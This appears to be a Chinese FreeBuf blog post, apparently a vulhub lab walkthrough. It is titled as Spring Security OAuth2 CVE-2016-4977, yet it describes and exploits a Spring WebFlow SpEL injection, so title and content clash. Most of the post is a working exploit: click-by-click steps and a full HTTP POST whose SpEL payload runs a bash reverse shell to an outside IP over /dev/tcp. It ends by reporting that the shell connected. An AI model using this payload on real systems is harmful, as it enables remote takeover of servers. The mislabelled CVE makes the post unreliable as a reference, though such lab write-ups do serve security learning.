官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
Spring Security OAuth2 远程命令执行(CVE-2016-4977)
asengg- 关注
Spring Security OAuth2 远程命令执行(CVE-2016-4977)
影响版本:
2.0.0-2.0.9 ;1.0.0-1.0.5
漏洞简述:
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
漏洞利用:
1、输入账号密码登录(左侧有)
2、点击findhotel
3、随便点击一个
4、点击book hotel
5、随便输入信息16个数字,其他信息任意,然后点击proceed
6、来到此界面就可以打开burpsuite,进行点击confirm进行抓包了
7、构造的数据内容如下:
###&_(new+jaca.lang.ProcessBuilder(cmd)).start()=vulhub cmd就是要执行的命令
_eventId_confirm=&_csrf=c74d1ef4-ff53-4e15-b38d-e2c00a8212f4&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/47.108.160.30/8888+0>%261")).start()=vulhub
POC:
POST /hotels/booking?execution=e2s2 HTTP/1.1
Host: 123.58.224.8:26956
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
Origin: http://123.58.224.8:26956
Connection: close
Referer: http://123.58.224.8:26956/hotels/booking?execution=e2s2
Cookie: JSESSIONID=B42AC09B2FBE4F44347A8D6D2A8D3C77
Upgrade-Insecure-Requests: 1
_eventId_confirm=&_csrf=c74d1ef4-ff53-4e15-b38d-e2c00a8212f4&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/47.108.160.30/8888+0>%261")).start()=vulhub
可以看到成功反弹shell
本文为 asengg 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
asengg LV.4
这家伙太懒了,还未填写个人描述!
- 13 文章数
- 1 关注者
ThinkPHP 3.2.x代码执行
2024-06-10
WebLogic远程代码执行 (CVE-2018-2893)
2024-06-10
Frida主机端与模拟器端的配置
2024-06-10